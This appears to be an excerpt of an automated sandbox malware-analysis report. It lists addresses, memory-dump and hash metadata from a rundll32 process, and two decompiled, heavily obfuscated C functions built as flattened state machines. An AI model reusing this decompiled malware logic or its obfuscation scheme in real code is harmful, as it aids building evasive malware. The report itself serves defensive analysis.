                                                                                                                      0x0018466e
                                                                                                                      0x00184676
                                                                                                                      0x00184681
                                                                                                                      0x00184690
                                                                                                                      0x00184691
                                                                                                                      0x0018469b
                                                                                                                      0x0018469f
                                                                                                                      0x001846a4
                                                                                                                      0x001846ac
                                                                                                                      0x001846b4
                                                                                                                      0x001846bc
                                                                                                                      0x001846c4
                                                                                                                      0x001846cc
                                                                                                                      0x001846d4
                                                                                                                      0x001846d9
                                                                                                                      0x001846de
                                                                                                                      0x001846e6
                                                                                                                      0x001846ee
                                                                                                                      0x001846f6
                                                                                                                      0x001846fe
                                                                                                                      0x00184706
                                                                                                                      0x0018470e
                                                                                                                      0x00184716
                                                                                                                      0x00184723
                                                                                                                      0x00184727
                                                                                                                      0x0018472f
                                                                                                                      0x00184737
                                                                                                                      0x0018473f
                                                                                                                      0x00184744
                                                                                                                      0x00184749
                                                                                                                      0x0018474e
                                                                                                                      0x00184756
                                                                                                                      0x0018475e
                                                                                                                      0x00184766
                                                                                                                      0x0018476e
                                                                                                                      0x00184776
                                                                                                                      0x0018477e
                                                                                                                      0x00184786
                                                                                                                      0x0018478e
                                                                                                                      0x00184796
                                                                                                                      0x0018479e
                                                                                                                      0x001847ab
                                                                                                                      0x001847af
                                                                                                                      0x001847b7
                                                                                                                      0x001847bf
                                                                                                                      0x001847cc
                                                                                                                      0x001847d2
                                                                                                                      0x001847da
                                                                                                                      0x001847e2
                                                                                                                      0x001847e7
                                                                                                                      0x001847ec
                                                                                                                      0x001847f4
                                                                                                                      0x00184803
                                                                                                                      0x00184806
                                                                                                                      0x0018480a
                                                                                                                      0x0018480f
                                                                                                                      0x00184817
                                                                                                                      0x0018481f
                                                                                                                      0x00184827
                                                                                                                      0x0018482c
                                                                                                                      0x00184834
                                                                                                                      0x00184844
                                                                                                                      0x00184848
                                                                                                                      0x00184850
                                                                                                                      0x0018485b
                                                                                                                      0x00184866
                                                                                                                      0x00184871
                                                                                                                      0x0018487e
                                                                                                                      0x0018487f
                                                                                                                      0x00184883
                                                                                                                      0x0018488b
                                                                                                                      0x00184898
                                                                                                                      0x0018489c
                                                                                                                      0x001848a4
                                                                                                                      0x001848b7
                                                                                                                      0x001848bb
                                                                                                                      0x001848c3
                                                                                                                      0x001848cb
                                                                                                                      0x001848d3
                                                                                                                      0x001848db
                                                                                                                      0x001848e8
                                                                                                                      0x001848f0
                                                                                                                      0x001848fd
                                                                                                                      0x00184901
                                                                                                                      0x00184909
                                                                                                                      0x00184911
                                                                                                                      0x00184919
                                                                                                                      0x00184921
                                                                                                                      0x00184929
                                                                                                                      0x00184931
                                                                                                                      0x00184936
                                                                                                                      0x0018493e
                                                                                                                      0x00184946
                                                                                                                      0x00184951
                                                                                                                      0x0018495c
                                                                                                                      0x00184967
                                                                                                                      0x0018496f
                                                                                                                      0x00184977
                                                                                                                      0x0018497f
                                                                                                                      0x00184987
                                                                                                                      0x0018498f
                                                                                                                      0x00184997
                                                                                                                      0x0018499f
                                                                                                                      0x001849a7
                                                                                                                      0x001849af
                                                                                                                      0x001849b7
                                                                                                                      0x001849c5
                                                                                                                      0x00184ad4
                                                                                                                      0x00184ad5
                                                                                                                      0x00184add
                                                                                                                      0x00184ae2
                                                                                                                      0x00184aed
                                                                                                                      0x00184aef
                                                                                                                      0x00000000
                                                                                                                      0x00184aef
                                                                                                                      0x001849cb
                                                                                                                      0x001849d1
                                                                                                                      0x00184b41
                                                                                                                      0x001849d7
                                                                                                                      0x001849dd
                                                                                                                      0x00184a72
                                                                                                                      0x00184aaf
                                                                                                                      0x00184ab4
                                                                                                                      0x00184abb
                                                                                                                      0x00184ac1
                                                                                                                      0x00000000
                                                                                                                      0x00184ac1
                                                                                                                      0x001849e3
                                                                                                                      0x001849e9
                                                                                                                      0x00184afe
                                                                                                                      0x00184b04
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00184b0a
                                                                                                                      0x001849ef
                                                                                                                      0x001849fb
                                                                                                                      0x00184a10
                                                                                                                      0x00184a48
                                                                                                                      0x00184a4d
                                                                                                                      0x00184a54
                                                                                                                      0x00184b15
                                                                                                                      0x00184b17
                                                                                                                      0x00184b1f
                                                                                                                      0x00184a5a
                                                                                                                      0x00184a5a
                                                                                                                      0x00000000
                                                                                                                      0x00184a5a
                                                                                                                      0x00184a54
                                                                                                                      0x001849e9
                                                                                                                      0x001849dd
                                                                                                                      0x001849d1
                                                                                                                      0x00184b55
                                                                                                                      0x00184b55
                                                                                                                      0x00184af9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: 1b03a2d946ab38a77f472bedde630cf7f053d643425b66748d158fc11bd3b5df
                                                                                                                      • Instruction ID: 784ace14f8f575d57b992b7367b3382e779e01903f574303f276837a03a367fa
                                                                                                                      • Opcode Fuzzy Hash: 1b03a2d946ab38a77f472bedde630cf7f053d643425b66748d158fc11bd3b5df
                                                                                                                      • Instruction Fuzzy Hash: 57D10FB24087819FD768CF65C989A5BBBF1BBD4708F508A1DF2D986260D7B19948CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017E243 Relevance: 4.0, Strings: 3, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0017E243() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _t246;
				signed int _t250;
				intOrPtr _t256;
				intOrPtr _t261;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				intOrPtr _t277;
				void* _t300;
				char _t304;
				void* _t305;
				void* _t307;

				_v20 = 0x755bf0;
				_v16 = 0xbb5ee2;
				_v12 = 0xb403bb;
				_t262 = 0;
				_v8 = 0;
				_v108 = 0x84f903;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x00052a35;
				_v108 = _v108 + 0x3d3f;
				_v108 = _v108 ^ 0x3e47d87c;
				_v88 = 0x71c3c4;
				_v88 = _v88 + 0xffffe131;
				_t264 = 0x3b;
				_v88 = _v88 / _t264;
				_v88 = _v88 ^ 0x40aa9d70;
				_t300 = 0xfb124ba;
				_v88 = _v88 ^ 0x40a0f61c;
				_v52 = 0x7362f6;
				_v52 = _v52 | 0xb899219a;
				_v52 = _v52 ^ 0xb8f51d59;
				_v56 = 0xfd4e8c;
				_t265 = 0x71;
				_v56 = _v56 * 0x54;
				_v56 = _v56 ^ 0x53104169;
				_v92 = 0xd5c279;
				_v92 = _v92 + 0x8479;
				_v92 = _v92 + 0xffffbe38;
				_v92 = _v92 / _t265;
				_v92 = _v92 ^ 0x0004c231;
				_v68 = 0x9eb1ac;
				_t266 = 0x4a;
				_v68 = _v68 * 0x7b;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x87ec7921;
				_v104 = 0x24a1b7;
				_v104 = _v104 << 4;
				_v104 = _v104 | 0x0d0d6548;
				_t62 =  &_v104; // 0xd0d6548
				_v104 =  *_t62 / _t266;
				_v104 = _v104 ^ 0x003eb00a;
				_v96 = 0x109237;
				_v96 = _v96 ^ 0x088082ff;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0xdcc593d2;
				_v96 = _v96 ^ 0xd88ac121;
				_v100 = 0xaca53b;
				_v100 = _v100 >> 0xc;
				_t267 = 0x53;
				_v100 = _v100 * 0x47;
				_v100 = _v100 + 0xffff22d9;
				_v100 = _v100 ^ 0x0009f7ae;
				_v60 = 0xde163e;
				_v60 = _v60 + 0xffffe594;
				_v60 = _v60 ^ 0x00de9d26;
				_v120 = 0x240793;
				_v120 = _v120 / _t267;
				_v120 = _v120 * 0x19;
				_v120 = _v120 + 0xd430;
				_v120 = _v120 ^ 0x0006e0c9;
				_v124 = 0xc58e86;
				_t268 = 0x65;
				_v124 = _v124 / _t268;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0x9d14b09a;
				_v124 = _v124 ^ 0x9d1ca329;
				_v64 = 0xc78ca0;
				_v64 = _v64 | 0xd15d632f;
				_v64 = _v64 ^ 0xd1d5a42f;
				_v128 = 0x79ba0a;
				_v128 = _v128 ^ 0x7ce03b8e;
				_v128 = _v128 + 0x4723;
				_v128 = _v128 >> 0xa;
				_v128 = _v128 ^ 0x00126e73;
				_v112 = 0x301104;
				_v112 = _v112 ^ 0x99cc29f1;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 << 0xe;
				_v112 = _v112 ^ 0xcfe465e8;
				_v72 = 0xf18177;
				_v72 = _v72 + 0xffff968e;
				_v72 = _v72 + 0x6cf6;
				_v72 = _v72 ^ 0x00fdce33;
				_v76 = 0xd90ee1;
				_v76 = _v76 + 0xffffa364;
				_v76 = _v76 ^ 0x3c048803;
				_v76 = _v76 ^ 0x3cd13d13;
				_v116 = 0xc42f7d;
				_v116 = _v116 >> 2;
				_v116 = _v116 + 0x3407;
				_v116 = _v116 >> 7;
				_v116 = _v116 ^ 0x0009b6df;
				_v48 = 0xe39a19;
				_v48 = _v48 | 0x7412591d;
				_v48 = _v48 ^ 0x74ffcd98;
				_v80 = 0xc90483;
				_v80 = _v80 >> 1;
				_t269 = 0x17;
				_v80 = _v80 / _t269;
				_v80 = _v80 * 0x7d;
				_v80 = _v80 ^ 0x0220ab71;
				_v84 = 0xc67ab0;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 * 3;
				_v84 = _v84 | 0xfb397840;
				_v84 = _v84 ^ 0xfb3c3624;
				_t304 = _v44;
				_t299 = _v44;
				goto L1;
				do {
					while(1) {
						L1:
						_t307 = _t300 - 0x73106c8;
						if(_t307 > 0) {
							break;
						}
						if(_t307 == 0) {
							_t250 = E0018026B(_v96,  &_v40,  &_v32, _v100, _v60);
							_t305 = _t305 + 0xc;
							asm("sbb esi, esi");
							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
							continue;
						}
						if(_t300 == 0xc1fb10) {
							_t300 = 0xde7de8b;
							if(_v44 > 2) {
								_t261 = E0018561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
								_v40 = _t261;
								if(_t261 != 0) {
									_t300 = 0x73106c8;
								}
							}
							continue;
						}
						if(_t300 == 0x37ef4f2) {
							_t304 = E0018E35A();
							_t300 = 0xc8dd531;
							continue;
						}
						if(_t300 == 0x44dd11e) {
							E001768DE(_v112, _v72, _v76, _v116, _v40);
							_t305 = _t305 + 0xc;
							_t300 = 0xde7de8b;
							continue;
						}
						if(_t300 != 0x677d978) {
							goto L21;
						} else {
							_t256 =  *0x19520c; // 0x0
							E0017F4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
							_t277 =  *0x19520c; // 0x0
							_t305 = _t305 + 0x14;
							_t262 = 1;
							_t300 = 0x44dd11e;
							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
							continue;
						}
					}
					if(_t300 == 0xc8dd531) {
						_t246 = E0017BC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
						_t299 = _t246;
						_t305 = _t305 + 0x10;
						if(_t246 == 0) {
							_t300 = 0xa73b483;
							goto L21;
						}
						_t300 = 0xc1fb10;
						goto L1;
					}
					if(_t300 == 0xde7de8b) {
						E0017FFF2(_v48, _v80, _v84, _t299);
						L24:
						return _t262;
					}
					if(_t300 != 0xfb124ba) {
						goto L21;
					}
					_t300 = 0x37ef4f2;
					goto L1;
					L21:
				} while (_t300 != 0xa73b483);
				goto L24;
			}


















































                                                                                                                      0x0017e249
                                                                                                                      0x0017e253
                                                                                                                      0x0017e25b
                                                                                                                      0x0017e265
                                                                                                                      0x0017e267
                                                                                                                      0x0017e26e
                                                                                                                      0x0017e276
                                                                                                                      0x0017e27b
                                                                                                                      0x0017e283
                                                                                                                      0x0017e28b
                                                                                                                      0x0017e293
                                                                                                                      0x0017e29b
                                                                                                                      0x0017e2ab
                                                                                                                      0x0017e2b0
                                                                                                                      0x0017e2b6
                                                                                                                      0x0017e2be
                                                                                                                      0x0017e2c3
                                                                                                                      0x0017e2cb
                                                                                                                      0x0017e2d3
                                                                                                                      0x0017e2db
                                                                                                                      0x0017e2e3
                                                                                                                      0x0017e2f0
                                                                                                                      0x0017e2f3
                                                                                                                      0x0017e2f7
                                                                                                                      0x0017e2ff
                                                                                                                      0x0017e307
                                                                                                                      0x0017e30f
                                                                                                                      0x0017e31f
                                                                                                                      0x0017e323
                                                                                                                      0x0017e32b
                                                                                                                      0x0017e338
                                                                                                                      0x0017e33b
                                                                                                                      0x0017e33f
                                                                                                                      0x0017e344
                                                                                                                      0x0017e34c
                                                                                                                      0x0017e354
                                                                                                                      0x0017e359
                                                                                                                      0x0017e361
                                                                                                                      0x0017e369
                                                                                                                      0x0017e36d
                                                                                                                      0x0017e375
                                                                                                                      0x0017e37d
                                                                                                                      0x0017e385
                                                                                                                      0x0017e389
                                                                                                                      0x0017e391
                                                                                                                      0x0017e399
                                                                                                                      0x0017e3a1
                                                                                                                      0x0017e3ab
                                                                                                                      0x0017e3ac
                                                                                                                      0x0017e3b0
                                                                                                                      0x0017e3b8
                                                                                                                      0x0017e3c0
                                                                                                                      0x0017e3c8
                                                                                                                      0x0017e3d0
                                                                                                                      0x0017e3d8
                                                                                                                      0x0017e3e6
                                                                                                                      0x0017e3ef
                                                                                                                      0x0017e3f3
                                                                                                                      0x0017e3fb
                                                                                                                      0x0017e405
                                                                                                                      0x0017e413
                                                                                                                      0x0017e418
                                                                                                                      0x0017e41e
                                                                                                                      0x0017e423
                                                                                                                      0x0017e42b
                                                                                                                      0x0017e433
                                                                                                                      0x0017e43b
                                                                                                                      0x0017e443
                                                                                                                      0x0017e44b
                                                                                                                      0x0017e453
                                                                                                                      0x0017e45b
                                                                                                                      0x0017e463
                                                                                                                      0x0017e468
                                                                                                                      0x0017e470
                                                                                                                      0x0017e478
                                                                                                                      0x0017e480
                                                                                                                      0x0017e485
                                                                                                                      0x0017e48a
                                                                                                                      0x0017e492
                                                                                                                      0x0017e49a
                                                                                                                      0x0017e4a2
                                                                                                                      0x0017e4aa
                                                                                                                      0x0017e4b2
                                                                                                                      0x0017e4ba
                                                                                                                      0x0017e4c2
                                                                                                                      0x0017e4ca
                                                                                                                      0x0017e4d2
                                                                                                                      0x0017e4da
                                                                                                                      0x0017e4df
                                                                                                                      0x0017e4e7
                                                                                                                      0x0017e4ec
                                                                                                                      0x0017e4f4
                                                                                                                      0x0017e4fc
                                                                                                                      0x0017e504
                                                                                                                      0x0017e50c
                                                                                                                      0x0017e514
                                                                                                                      0x0017e51c
                                                                                                                      0x0017e51f
                                                                                                                      0x0017e528
                                                                                                                      0x0017e52c
                                                                                                                      0x0017e534
                                                                                                                      0x0017e53c
                                                                                                                      0x0017e546
                                                                                                                      0x0017e54a
                                                                                                                      0x0017e552
                                                                                                                      0x0017e55a
                                                                                                                      0x0017e55e
                                                                                                                      0x0017e55e
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e568
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e56e
                                                                                                                      0x0017e680
                                                                                                                      0x0017e685
                                                                                                                      0x0017e68c
                                                                                                                      0x0017e694
                                                                                                                      0x00000000
                                                                                                                      0x0017e694
                                                                                                                      0x0017e57a
                                                                                                                      0x0017e633
                                                                                                                      0x0017e638
                                                                                                                      0x0017e64e
                                                                                                                      0x0017e653
                                                                                                                      0x0017e65b
                                                                                                                      0x0017e661
                                                                                                                      0x0017e661
                                                                                                                      0x0017e65b
                                                                                                                      0x00000000
                                                                                                                      0x0017e638
                                                                                                                      0x0017e586
                                                                                                                      0x0017e622
                                                                                                                      0x0017e624
                                                                                                                      0x00000000
                                                                                                                      0x0017e624
                                                                                                                      0x0017e592
                                                                                                                      0x0017e607
                                                                                                                      0x0017e60c
                                                                                                                      0x0017e60f
                                                                                                                      0x00000000
                                                                                                                      0x0017e60f
                                                                                                                      0x0017e59a
                                                                                                                      0x00000000
                                                                                                                      0x0017e5a0
                                                                                                                      0x0017e5b8
                                                                                                                      0x0017e5cb
                                                                                                                      0x0017e5d0
                                                                                                                      0x0017e5df
                                                                                                                      0x0017e5e2
                                                                                                                      0x0017e5e3
                                                                                                                      0x0017e5e8
                                                                                                                      0x00000000
                                                                                                                      0x0017e5e8
                                                                                                                      0x0017e59a
                                                                                                                      0x0017e6a5
                                                                                                                      0x0017e6d7
                                                                                                                      0x0017e6dc
                                                                                                                      0x0017e6de
                                                                                                                      0x0017e6e3
                                                                                                                      0x0017e6ef
                                                                                                                      0x00000000
                                                                                                                      0x0017e6ef
                                                                                                                      0x0017e6e5
                                                                                                                      0x00000000
                                                                                                                      0x0017e6e5
                                                                                                                      0x0017e6ad
                                                                                                                      0x0017e70f
                                                                                                                      0x0017e719
                                                                                                                      0x0017e722
                                                                                                                      0x0017e722
                                                                                                                      0x0017e6b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e6b7
                                                                                                                      0x00000000
                                                                                                                      0x0017e6f4
                                                                                                                      0x0017e6f4
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: ccf7a86146b84a08412256d4e4a903ebb1c929542f426867e46c592da0d922c1
                                                                                                                      • Instruction ID: 988b23f968dc1df1580f91e3937e859ae46280373a59df1ed65c6c0aca720368
                                                                                                                      • Opcode Fuzzy Hash: ccf7a86146b84a08412256d4e4a903ebb1c929542f426867e46c592da0d922c1
                                                                                                                      • Instruction Fuzzy Hash: AFC14FB68083809BC358CF65D48A40BFBF1BBD8758F50892DF59A96260D7B1D949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017911A Relevance: 4.0, Strings: 3, Instructions: 254COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0017911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v112;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v156;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				void* _t162;
				signed int _t176;
				signed int _t184;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr _t207;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t236;
				void* _t238;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t162);
				_v68 = 0x6e7241;
				_t236 = _t235 + 0x10;
				asm("stosd");
				_t198 = 0;
				_t200 = 0x513154f;
				asm("stosd");
				_t231 = 0x5b;
				asm("stosd");
				_v208 = 0x6dc976;
				_v208 = _v208 + 0xffff97e7;
				_v208 = _v208 << 0xf;
				_v208 = _v208 + 0xffff3ee4;
				_v208 = _v208 ^ 0xb0a037f9;
				_v216 = 0xefa27a;
				_v216 = _v216 * 0x2d;
				_v216 = _v216 << 0xe;
				_v216 = _v216 + 0x5c30;
				_v216 = _v216 ^ 0xe3d2b40e;
				_v192 = 0xd4fef0;
				_v192 = _v192 / _t231;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x04a09c26;
				_v172 = 0xfabcfe;
				_v172 = _v172 + 0xadb7;
				_v172 = _v172 ^ 0x00f6fe01;
				_v224 = 0xb5a285;
				_t232 = 0x43;
				_v224 = _v224 * 0x7a;
				_v224 = _v224 >> 1;
				_v224 = _v224 | 0x4641179d;
				_v224 = _v224 ^ 0x6f41a140;
				_v212 = 0x80e1bd;
				_v212 = _v212 / _t232;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 ^ 0x0005f6ff;
				_v220 = 0x3f6ee7;
				_v220 = _v220 >> 5;
				_v220 = _v220 << 0xf;
				_v220 = _v220 | 0x5ccf7ed2;
				_v220 = _v220 ^ 0xfdf08ccb;
				_v188 = 0x96b178;
				_v188 = _v188 * 0x33;
				_v188 = _v188 << 7;
				_v188 = _v188 ^ 0x02ac94c8;
				_v196 = 0x862d42;
				_v196 = _v196 | 0x17619c21;
				_v196 = _v196 ^ 0x73c665d7;
				_v196 = _v196 ^ 0x642dc428;
				_v176 = 0xd9c085;
				_v176 = _v176 | 0xddbc98a5;
				_v176 = _v176 ^ 0xddfc0835;
				_v180 = 0xc6bbdd;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0x2850aa5e;
				_v168 = 0x548f7e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x015ffca1;
				_v204 = 0x6ca805;
				_v204 = _v204 + 0x3ad1;
				_v204 = _v204 * 0x44;
				_v204 = _v204 ^ 0x1ce18dde;
				_v184 = 0x9ecbae;
				_v184 = _v184 << 5;
				_v184 = _v184 ^ 0x13d028d8;
				_t233 = _v184;
				_v200 = 0xbd8de1;
				_v200 = _v200 + 0xffffb408;
				_v200 = _v200 | 0x119192b9;
				_v200 = _v200 ^ 0x11b45be6;
				while(1) {
					_t238 = _t200 - 0x8a8a415;
					if(_t238 <= 0) {
					}
					L2:
					if(_t238 == 0) {
						_t176 = E0017CA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
						_t236 = _t236 + 0x10;
						asm("sbb ecx, ecx");
						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
						continue;
						do {
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
							L45:
							__eflags = _t200 - 0x409adf;
						} while (__eflags != 0);
						L46:
						return _t198;
					}
					if(_t200 == 0x1cefc96) {
						__eflags = _v148 - 1;
						if(__eflags == 0) {
							E0017472E( &_v112);
							L16:
							_t200 = 0xdce0ab1;
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
						}
						_t200 = 0x6447723;
						while(1) {
							_t238 = _t200 - 0x8a8a415;
							if(_t238 <= 0) {
							}
							goto L25;
						}
						goto L2;
					}
					if(_t200 == 0x26bd5bb) {
						__eflags = _v148 - 6;
						if(__eflags == 0) {
							E0018A429( &_v112);
							goto L16;
						}
						_t200 = 0xcc2cd30;
						continue;
					}
					if(_t200 == 0x513154f) {
						E001864C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
						_t236 = _t236 + 0x10;
						_t200 = 0x7b50d2c;
						continue;
					}
					if(_t200 == 0x6447723) {
						__eflags = _v148 - 2;
						if(__eflags == 0) {
							E00185040( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x92d00b6;
						continue;
					}
					if(_t200 == 0x6fcaad9) {
						_t184 = E0018B9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
						_t236 = _t236 + 0x10;
						__eflags = _t184;
						if(__eflags == 0) {
							goto L46;
						}
						L12:
						_t200 = 0x8a8a415;
						continue;
					}
					if(_t200 != 0x7b50d2c) {
						goto L45;
					}
					E00176A1F(0);
					L10:
					_t200 = 0x6fcaad9;
					continue;
					L25:
					__eflags = _t200 - 0x92d00b6;
					if(_t200 == 0x92d00b6) {
						__eflags = _v148 - 3;
						if(__eflags == 0) {
							E001788F4( &_v112);
							_t200 = 0xdce0ab1;
							goto L45;
						}
						_t200 = 0xe60179d;
						continue;
					}
					__eflags = _t200 - 0xa53104b;
					if(_t200 == 0xa53104b) {
						_push(_t200);
						_push(_t200);
						_t202 = 0x44;
						_t233 = E00183512(_t202);
						__eflags = _t233;
						if(__eflags == 0) {
							goto L12;
						}
						_t200 = 0x1cefc96;
						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
						continue;
					}
					__eflags = _t200 - 0xc419b15;
					if(_t200 == 0xc419b15) {
						__eflags = _v148 - 5;
						if(__eflags == 0) {
							E00180946( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x26bd5bb;
						continue;
					}
					__eflags = _t200 - 0xcc2cd30;
					if(_t200 == 0xcc2cd30) {
						__eflags = _v148 - 7;
						if(__eflags == 0) {
							E00177B82( &_v112);
						}
						goto L16;
					}
					__eflags = _t200 - 0xdce0ab1;
					if(__eflags == 0) {
						_t207 =  *0x195c94; // 0x0
						_t198 = _t198 + 1;
						 *_t233 =  *(_t207 + 0x230);
						 *(_t207 + 0x230) = _t233;
						goto L10;
					}
					__eflags = _t200 - 0xe60179d;
					if(_t200 != 0xe60179d) {
						goto L45;
					}
					__eflags = _v148 - 4;
					if(__eflags == 0) {
						E00172FA1( &_v112);
						goto L16;
					}
					_t200 = 0xc419b15;
				}
			}









































                                                                                                                      0x00179124
                                                                                                                      0x0017912b
                                                                                                                      0x00179132
                                                                                                                      0x00179133
                                                                                                                      0x00179134
                                                                                                                      0x00179139
                                                                                                                      0x0017914d
                                                                                                                      0x00179150
                                                                                                                      0x00179153
                                                                                                                      0x00179155
                                                                                                                      0x0017915c
                                                                                                                      0x0017915d
                                                                                                                      0x00179160
                                                                                                                      0x00179161
                                                                                                                      0x00179169
                                                                                                                      0x00179171
                                                                                                                      0x00179176
                                                                                                                      0x0017917e
                                                                                                                      0x00179186
                                                                                                                      0x00179193
                                                                                                                      0x00179197
                                                                                                                      0x0017919c
                                                                                                                      0x001791a4
                                                                                                                      0x001791ac
                                                                                                                      0x001791bc
                                                                                                                      0x001791c0
                                                                                                                      0x001791c5
                                                                                                                      0x001791cd
                                                                                                                      0x001791d5
                                                                                                                      0x001791dd
                                                                                                                      0x001791e5
                                                                                                                      0x001791f2
                                                                                                                      0x001791f3
                                                                                                                      0x001791f7
                                                                                                                      0x001791fb
                                                                                                                      0x00179203
                                                                                                                      0x0017920b
                                                                                                                      0x00179219
                                                                                                                      0x0017921d
                                                                                                                      0x00179222
                                                                                                                      0x00179227
                                                                                                                      0x0017922f
                                                                                                                      0x00179237
                                                                                                                      0x0017923c
                                                                                                                      0x00179241
                                                                                                                      0x00179249
                                                                                                                      0x00179251
                                                                                                                      0x0017925e
                                                                                                                      0x00179262
                                                                                                                      0x00179267
                                                                                                                      0x0017926f
                                                                                                                      0x00179277
                                                                                                                      0x0017927f
                                                                                                                      0x00179287
                                                                                                                      0x0017928f
                                                                                                                      0x00179297
                                                                                                                      0x0017929f
                                                                                                                      0x001792a7
                                                                                                                      0x001792b4
                                                                                                                      0x001792b8
                                                                                                                      0x001792c0
                                                                                                                      0x001792c8
                                                                                                                      0x001792cd
                                                                                                                      0x001792d5
                                                                                                                      0x001792e2
                                                                                                                      0x001792f4
                                                                                                                      0x001792f8
                                                                                                                      0x00179300
                                                                                                                      0x00179308
                                                                                                                      0x0017930d
                                                                                                                      0x00179315
                                                                                                                      0x00179319
                                                                                                                      0x00179321
                                                                                                                      0x00179329
                                                                                                                      0x00179331
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00179341
                                                                                                                      0x00179341
                                                                                                                      0x00179477
                                                                                                                      0x0017947c
                                                                                                                      0x00179483
                                                                                                                      0x0017948b
                                                                                                                      0x00179491
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x001795b0
                                                                                                                      0x001795b0
                                                                                                                      0x001795b0
                                                                                                                      0x001795bf
                                                                                                                      0x001795c8
                                                                                                                      0x001795c8
                                                                                                                      0x0017934d
                                                                                                                      0x0017943f
